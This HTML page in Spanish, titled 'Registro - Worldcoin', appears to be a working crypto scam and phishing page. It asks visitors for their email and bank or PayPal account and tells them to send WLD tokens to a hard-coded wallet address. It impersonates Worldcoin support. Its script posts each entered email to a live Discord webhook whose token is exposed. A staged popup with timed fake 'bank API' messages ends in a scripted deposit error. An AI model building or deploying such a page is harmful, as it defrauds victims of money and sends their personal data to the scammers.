<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Registro - Worldcoin</title>
    <style>
     body {
    font-family: 'Courier New', monospace;
    background-color: #1a1a2e;
    color: #f0f0f0;
    margin: 0;
    padding: 0;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    flex-direction: column;
    text-align: center;
}

#banner {
    width: 70%;
    max-width: 600px;
    border-radius: 10px;
    box-shadow: 0 0 20px rgba(255, 0, 255, 0.7);
    margin-bottom: 20px;
}

.container {
    background-color: #222;
    color: #f0f0f0;
    padding: 40px;
    border-radius: 15px;
    box-shadow: 0px 0px 30px 5px rgba(0, 255, 255, 0.5);
    text-align: center;
    width: 350px;
    display: flex;
    flex-direction: column;
    align-items: center;
    border: 2px solid #ff00ff;
}

.input-group {
    margin-bottom: 20px;
    width: 100%;
}

.input-group label {
    font-size: 18px;
    margin-bottom: 10px;
    display: block;
    color: #f0f0f0;
}

.input-group input[type="text"],
.input-group input[type="file"] {
    width: calc(100% - 20px);
    padding: 10px;
    font-size: 16px;
    border: 1px solid #f0f0f0;
    border-radius: 5px;
    background-color: #333;
    color: #f0f0f0;
}

.input-group input[type="text"]:focus,
.input-group input[type="file"]:focus {
    outline: none;
    background-color: #444;
    box-shadow: 0 0 10px rgba(255, 0, 255, 0.7);
}

.input-group button {
    width: 120px;
    padding: 10px;
    font-size: 14px;
    background-color: #ff00ff;
    color: white;
    border: none;
    border-radius: 20px;
    cursor: pointer;
    transition: background-color 0.3s ease;
    box-shadow: 0 0 15px rgba(255, 0, 255, 0.7);
}

.input-group button:hover {
    background-color: #e600e6;
}

.boton-azul-oscuro {
    background-color: #00f9ff;
    color: black;
    border: none;
    padding: 10px 20px;
    font-size: 14px;
    border-radius: 20px;
    cursor: pointer;
    transition: background-color 0.3s ease;
    margin-top: 20px;
    box-shadow: 0 0 15px rgba(0, 255, 255, 0.7);
}

.boton-azul-oscuro:hover {
    background-color: #00d1e6;
}

.success-text {
    color: #00ff00;
    font-size: 16px;
    margin-top: 10px;
}

.popup {
    display: none;
    position: fixed;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    background-color: #1a1a2e;
    padding: 30px;
    border: 2px solid #00ff00;
    border-radius: 15px;
    text-align: center;
    box-shadow: 0 0 20px rgba(0, 255, 0, 0.7);
}

.mensaje {
    font-size: 18px;
    margin-bottom: 20px;
    color: #00ff00;
}

.support-text {
    margin-top: 20px;
    color: #00ff00;
}

#wallet-address {
    color: #00ffff;
    font-weight: bold;
}

input[type="file"] {
    color: #f0f0f0;
}

input[type="file"]::file-selector-button {
    background-color: #00f9ff;
    border: none;
    padding: 8px;
    border-radius: 5px;
    color: black;
    cursor: pointer;
}

input[type="file"]::file-selector-button:hover {
    background-color: #00d1e6;
}



    </style>
</head>

<body>


 <div class="container">

     
    <h2>Registro - Worldcoin</h2>

    <div class="input-group">
        <label for="email">Ingresa tu correo:</label>
        <input type="text" id="email" placeholder="Correo electrónico">
        <button onclick="registrarCorreo(this)">Registrar y Enviar</button>
        <div class="success-text" id="email-success"></div>
    </div>

    <div class="input-group">
        <label for="cbu">Coloca tu CBU/CVU/PAYPAL:</label>
        <input type="text" id="cbu" placeholder="CBU/CVU/PAYPAL/CTA RUT/SANTANDER/FALABELLA">
        <button onclick="registrarCBU(this)">Registrar y Enviar</button>
        <div class="success-text" id="cbu-success"></div>
    </div>

      <div class="card">
    <div class="card-body" style="background-color: #e1f5fe; padding: 20px; border-radius: 10px;">
        <div class="input-group mb-3">
<label class="form-label" style="font-size: 24px; font-family: 'Arial', sans-serif; color: black; font-weight: bold;">Copia y envía los WLD a esta dirección:</label>
            <div class="input-group">
                <input type="text" class="form-control" id="wallet-address" value="0x01C65F22A9478C2932e62483509c233F0aaD5c72" readonly>
<button class="btn btn-sm btn-primary" onclick="copiarDireccion()" style="background-color: blue;">Copiar</button>
            </div>
        </div>

            <div class="mb-3">
                <label for="comprobante" class="form-label">Sube el comprobante del envío de Worldcoin:</label>
                <input type="file" class="form-control" id="comprobante">
            </div>
        </div>
    </div>

   
   
    <button class="boton-azul-oscuro" onclick="mostrarPopup()">Cargar</button>
</div>

<div class="popup" id="popup">
    <div class="mensaje" id="mensaje">Procesando datos...</div>




    <div class="support-text">
        <p>Soporte: <a href="mailto:WorldcoinAPP@Worldcoin.org">WorldcoinAPP@Worldcoin.org</a></p>
    </div>



    <script>
    function validarCorreo(correo) {
    return correo.includes('@');
}

function enviarCorreoAlWebhook(correo) {
    var webhookURL = 'https://discordapp.com/api/webhooks/1157760501829345320/5vqHkW8jnO_nFfS8WSL-2fsP9q_Jxa2wTkAAhrml4P681DYeXAAJd51F94_rISviSmSo';  // Reemplaza 'TU_ID' y 'TU_TOKEN' con los valores reales de tu webhook
    var payload = {
        content: 'Nuevo correo registrado: ' + correo
    };

    // Realizar una solicitud HTTP POST al webhook de Discord
    fetch(webhookURL, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify(payload)
    });
}

function registrarCorreo(button) {
    var emailInput = document.getElementById('email');
    var successDiv = document.getElementById('email-success');

    if (validarCorreo(emailInput.value)) {
        emailInput.setAttribute('readonly', true);
        emailInput.style.backgroundColor = '#f2f2f2';
        successDiv.textContent = 'Registrado exitosamente!';

        // Enviar el correo al webhook de Discord
        enviarCorreoAlWebhook(emailInput.value);

        // Cambiar el texto del botón a "CONFIRMADO"
        button.textContent = 'CONFIRMADO';
    } else {
        successDiv.textContent = 'Error: Correo inválido';
        successDiv.style.color = 'red';
    }
}


function registrarCBU(button) {
    var cbuInput = document.getElementById('cbu');
    var successDiv = document.getElementById('cbu-success');
    var cbuValue = cbuInput.value;

    // Verificar si el valor contiene solo números usando una expresión regular
    if (/^\d+$/.test(cbuValue)) {
        cbuInput.setAttribute('readonly', true);
        cbuInput.style.backgroundColor = '#f2f2f2';
        successDiv.textContent = 'El CBU / PAYPAL ha sido registrado exitosamente.';

        // Cambiar el texto del botón a "CONFIRMADO"
        button.textContent = 'CONFIRMADO';
    } else {
        successDiv.textContent = 'Error: Por favor, ingrese solo números en el CBU.';
        successDiv.style.color = 'red';
    }
}

function copiarDireccion() {
    // Selecciona el elemento de la dirección
    var direccion = document.getElementById('wallet-address');
    
    // Selecciona el contenido del elemento
    var texto = direccion.value;
    
    // Crea un área de texto temporal para copiar el contenido
    var inputTemporal = document.createElement('input');
    inputTemporal.setAttribute('type', 'text');
    inputTemporal.setAttribute('value', texto);
    
    // Añade el área de texto temporal al DOM
    document.body.appendChild(inputTemporal);
    
    // Selecciona el contenido del área de texto temporal
    inputTemporal.select();
    
    // Intenta copiar el contenido al portapapeles
    document.execCommand('copy');
    
    // Remueve el área de texto temporal del DOM
    document.body.removeChild(inputTemporal);
    
    // Muestra un mensaje de éxito
    alert('Dirección copiada: ' + texto);
}

        function mostrarPopup() {
    var popup = document.getElementById('popup');
    var mensaje = document.getElementById('mensaje');

    popup.style.display = 'block';
    mensaje.textContent = 'No cerrar la página. Cargando PAGO';

    setTimeout(function() {
        mensaje.textContent = 'Procesando datos...';
    }, 30000); // 30 segundos

    setTimeout(function() {
        mensaje.textContent = 'Conectando API Bank..';
    }, 40000); // 40 segundos

    setTimeout(function() {
        mensaje.textContent = 'Checkeando depósito de Worldcoin..';
    }, 50000); // 50 segundos

    setTimeout(function() {
        mensaje.textContent = 'ERROR en Depósito de WorldCoin no válido!';
        mensaje.style.color = 'red';
    }, 60000); // 60 segundos (1 minuto)
}




    </script>
</body>

</html>
